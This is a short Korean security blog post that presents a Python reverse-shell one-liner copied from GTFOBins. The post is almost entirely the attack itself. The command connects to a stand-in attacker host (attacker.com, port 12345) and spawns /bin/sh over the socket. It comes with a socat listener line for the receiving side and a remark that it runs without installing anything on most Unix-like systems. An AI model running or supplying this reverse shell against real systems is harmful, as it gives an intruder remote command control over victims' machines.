시스템 보안 - 파이썬 리버스 쉘 스크립트

728x90

export RHOST=attacker.com
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'

대부분의 유닉스 계열의 OS(리눅스, 맥os)에는 python2는 설치가 되어있는 경우가 많으니 별도의 설치 없이 명령어만으로 사용 가능하다.

출처:
https://gtfobins.github.io/gtfobins/python/#reverse-shell

python | GTFOBins

Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s

gtfobins.github.io

728x90

'🔒정보보안 > 시스템 보안' 카테고리의 다른 글

시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격 (0)	2023.02.07
시스템 보안 - 실행 파일이 없는 우회 기법(파일리스 공격) (0)	2023.02.07
시스템 보안 - 메타스플로잇 msfvenom 리버스 쉘 제작 명령어 (0)	2023.01.24
시스템 보안 - EXE 확장자를 대체하는 확장자들(SCR, COM, BAT) (0)	2022.10.07
시스템 보안 - Jscript (0)	2022.10.06

HackLog

시스템 보안 - 파이썬 리버스 쉘 스크립트

'🔒정보보안 > 시스템 보안' 카테고리의 다른 글

티스토리툴바

시스템 보안 - 파이썬 리버스 쉘 스크립트

'🔒정보보안 > 시스템 보안' 카테고리의 다른 글

관련글

티스토리툴바